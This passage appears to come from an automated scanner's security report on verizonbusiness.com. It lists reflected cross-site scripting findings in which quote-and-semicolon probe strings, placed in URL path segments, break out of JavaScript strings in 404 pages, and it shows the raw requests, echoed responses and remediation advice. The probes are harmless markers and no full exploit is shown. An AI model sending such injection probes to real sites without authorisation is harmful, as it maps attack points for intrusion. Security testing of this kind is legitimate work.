Date: Wed, 17 Nov 2010 00:37:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsb124f';6025ac978be/bysolutions/productivity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.980. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c08c"%3b82f1e5d6685 was submitted in the REST URL parameter 1. This input was echoed as 4c08c";82f1e5d6685 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4c08c"%3b82f1e5d6685/bysolutions/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions4c08c";82f1e5d6685/bysolutions/productivity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.981. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccbfd'%3bd92b3d19e02 was submitted in the REST URL parameter 2. This input was echoed as ccbfd';d92b3d19e02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsccbfd'%3bd92b3d19e02/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsccbfd';d92b3d19e02/productivity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.982. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa27f"%3bc972096f565 was submitted in the REST URL parameter 2. This input was echoed as fa27f";c972096f565 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsfa27f"%3bc972096f565/productivity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutionsfa27f";c972096f565/productivity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.983. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98ae8'%3b12407ce8189 was submitted in the REST URL parameter 3. This input was echoed as 98ae8';12407ce8189 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/productivity98ae8'%3b12407ce8189/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/productivity98ae8';12407ce8189/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.984. http://www.verizonbusiness.com/solutions/bysolutions/productivity/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/productivity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a3a8"%3b34da4bb390d was submitted in the REST URL parameter 3. This input was echoed as 9a3a8";34da4bb390d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/productivity9a3a8"%3b34da4bb390d/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/productivity9a3a8";34da4bb390d/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.985. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d15b'%3b8b9c5e4a137 was submitted in the REST URL parameter 1. This input was echoed as 3d15b';8b9c5e4a137 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions3d15b'%3b8b9c5e4a137/bysolutions/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:52 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Date: Wed, 17 Nov 2010 00:34:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions3d15b';8b9c5e4a137/bysolutions/professional/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.986. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7454e"%3bd726818009c was submitted in the REST URL parameter 1. This input was echoed as 7454e";d726818009c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions7454e"%3bd726818009c/bysolutions/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:29 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions7454e";d726818009c/bysolutions/professional/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.987. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee867'%3b50b1f8f5204 was submitted in the REST URL parameter 2. This input was echoed as ee867';50b1f8f5204 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsee867'%3b50b1f8f5204/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41882
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsee867';50b1f8f5204/professional/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.988. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8dc1a"%3bbb0222c97c3 was submitted in the REST URL parameter 2. This input was echoed as 8dc1a";bb0222c97c3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions8dc1a"%3bbb0222c97c3/professional/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:12 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41880
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions8dc1a";bb0222c97c3/professional/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.989. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f56a4"%3b1fe6f108021 was submitted in the REST URL parameter 3. This input was echoed as f56a4";1fe6f108021 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/professionalf56a4"%3b1fe6f108021/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/professionalf56a4";1fe6f108021/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.990. http://www.verizonbusiness.com/solutions/bysolutions/professional/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/professional/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5e12'%3b0c801a70782 was submitted in the REST URL parameter 3. This input was echoed as e5e12';0c801a70782 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/professionale5e12'%3b0c801a70782/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:10 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43104
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/professionale5e12';0c801a70782/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.991. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86481'%3b41a513cd807 was submitted in the REST URL parameter 1. This input was echoed as 86481';41a513cd807 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions86481'%3b41a513cd807/bysolutions/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:21 GMT
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:21 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:21 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions86481';41a513cd807/bysolutions/security/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.992. http://www.verizonbusiness.com/solutions/bysolutions/security/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/security/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76e01"%3b3f1f49b2768 was submitted in the REST URL parameter 1. This input was echoed as 76e01";3f1f49b2768 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions76e01"%3b3f1f49b2768/bysolutions/security/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
